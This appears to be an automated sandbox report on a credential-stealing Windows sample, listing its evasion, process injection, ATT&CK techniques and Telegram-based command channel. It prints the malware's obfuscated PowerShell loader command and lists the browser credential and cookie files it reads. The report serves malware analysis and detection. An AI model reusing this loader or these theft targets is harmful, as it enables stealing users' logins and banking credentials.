          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 598094 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 597969 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 597860 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 597735 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 597610 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 597485 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 597360 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 597235 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 597110 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 596985 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 596860 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 596735 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 596610 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 596491 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 596368 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 596219 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 596094 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 595985 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 595860 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 595735 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 595610 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 595485 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 595360 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 595235 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 595110 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Thread delayed: delay time: 594985 ms
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 594860Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 594735Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 594610Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 594485Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 594360Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 594235Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 594110Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeThread delayed: delay time: 593985Jump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exe | File opened: C:\Users\user\AppData
          Source: C:\Users\user\Desktop\URGENTE Ref.exe | File opened: C:\Users\user\AppData\Local\Microsoft
          Source: C:\Users\user\Desktop\URGENTE Ref.exe | File opened: C:\Users\user\AppData\Local
          Source: C:\Users\user\Desktop\URGENTE Ref.exe | File opened: C:\Users\user
          Source: C:\Users\user\Desktop\URGENTE Ref.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows
          Source: C:\Users\user\Desktop\URGENTE Ref.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
          Source: ModuleAnalysisCache.2.dr | Binary or memory string: Remove-NetEventVmNetworkAdapter
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696487552f
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696487552x
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696487552
          Source: Undismembered.exe, 0000000A.00000002.2478474026.0000000004038000.00000004.00000020.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000002.2478474026.0000000004091000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696487552
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696487552o
          Source: ModuleAnalysisCache.2.dr | Binary or memory string: Get-NetEventVmNetworkAdapter
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696487552
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696487552
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696487552j
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
          Source: powershell.exe, 00000002.00000002.1601132582.0000000005346000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapter@\
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
          Source: ModuleAnalysisCache.2.dr | Binary or memory string: Add-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000002.00000002.1601132582.0000000005346000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapter@\
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696487552t
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
          Source: powershell.exe, 00000002.00000002.1601132582.0000000005346000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapter@\
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696487552s
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696487552t
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
          Source: Undismembered.exe, 0000000A.00000002.2496698754.00000000217FC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
          Source: C:\Users\user\Desktop\URGENTE Ref.exe | API call chain: ExitProcess graph end node graph_0-3612
          Source: C:\Users\user\Desktop\URGENTE Ref.exe | API call chain: ExitProcess graph end node graph_0-3768
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Process token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\Undismembered.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread APC queued: target process: C:\Users\user\AppData\Local\Temp\Undismembered.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Users\user\AppData\Local\Temp\Undismembered.exe base: 16C0000
          Source: C:\Users\user\Desktop\URGENTE Ref.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Unsexual24=gc -Raw 'C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Theopneustic\Portentousness.Unm177';$Authorize=$Unsexual24.SubString(53440,3);.$Authorize($Unsexual24)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\Undismembered.exe "C:\Users\user\AppData\Local\Temp\Undismembered.exe"
          Source: C:\Users\user\Desktop\URGENTE Ref.exe | Code function: 0_2_100010D3 GetModuleFileNameA,GlobalAlloc,CharPrevA,GlobalFree,GetTempFileNameA,CopyFileA,CreateFileA,CreateFileMappingA,MapViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,lstrcatA,lstrlenA,GlobalAlloc,FindWindowExA,FindWindowExA,FindWindowExA,lstrcmpiA,DeleteFileA,GetVersion,GlobalAlloc,GlobalLock,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreatePipe,CreatePipe,CreatePipe,GetStartupInfoA,CreateProcessA,lstrcpyA,GetTickCount,PeekNamedPipe,GetTickCount,ReadFile,lstrlenA,lstrlenA,lstrlenA,lstrcpynA,lstrlenA,GlobalSize,GlobalUnlock,GlobalReAlloc,GlobalLock,lstrcatA,GlobalSize,lstrlenA,lstrcpyA,CharNextA,GetTickCount,TerminateProcess,lstrcpyA,Sleep,WaitForSingleObject,GetExitCodeProcess,PeekNamedPipe,lstrcpyA,lstrcpyA,wsprintfA,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DeleteFileA,GlobalFree,GlobalFree,GlobalUnlock,GlobalFree, 0_2_100010D3
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Undismembered.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeCode function: 0_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040322B
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          Source: Yara match  File source: 0000000A.00000002.2495516741.0000000020581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match  File source: Process Memory Space: Undismembered.exe PID: 7924, type: MEMORYSTR
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe  File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe  File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe  File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe  File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: Yara match  File source: Process Memory Space: Undismembered.exe PID: 7924, type: MEMORYSTR

          Remote Access Functionality

          Source: Yara match  File source: 0000000A.00000002.2495516741.0000000020581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match  File source: Process Memory Space: Undismembered.exe PID: 7924, type: MEMORYSTR

          MITRE ATT&CK Matrix

          Techniques observed for this sample, grouped by tactic. The figure in brackets is the count shown in the matrix cell of the report; tactics with no observed technique are listed as "none observed".

          Reconnaissance: none observed
          Resource Development: none observed
          Initial Access: none observed
          Execution: Windows Management Instrumentation [1], PowerShell [1]
          Persistence: DLL Side-Loading [1]
          Privilege Escalation: DLL Side-Loading [1], Access Token Manipulation [1], Process Injection [311]
          Defense Evasion: Disable or Modify Tools [1], Obfuscated Files or Information [2], Software Packing [1], DLL Side-Loading [1], Masquerading [1], Virtualization/Sandbox Evasion [31], Access Token Manipulation [1], Process Injection [311]
          Credential Access: OS Credential Dumping [1]
          Discovery: File and Directory Discovery [4], System Information Discovery [116], Security Software Discovery [21], Process Discovery [1], Virtualization/Sandbox Evasion [31], Application Window Discovery [1], System Network Configuration Discovery [1]
          Lateral Movement: none observed
          Collection: Archive Collected Data [1], Data from Local System [1], Email Collection [1], Clipboard Data [1]
          Command and Control: Web Service [1], Ingress Tool Transfer [3], Encrypted Channel [21], Non-Standard Port [1], Non-Application Layer Protocol [3], Application Layer Protocol [24]
          Exfiltration: none observed
          Impact: System Shutdown/Reboot [1]
          Behavior Graph

          Behavior Graph ID: 1633323, Sample: URGENTE Ref.exe, Start date: 10/03/2025, Architecture: WINDOWS, Score: 100

          Contacted domains and IPs: reallyfreegeoip.org (Tries to detect the country of the analysis system (by using the IP)), api.telegram.org (Uses the Telegram API (likely for C&C communication)), 5 other IPs or domains
          Sample-level signatures: Suricata IDS alerts for network traffic, Found malware configuration, Multi AV Scanner detection for submitted file, 4 other signatures

          Process chain as shown in the graph:
          1. URGENTE Ref.exe (started) drops C:\Users\user\AppData\Local\...\nsExec.dll (PE32) and starts powershell.exe
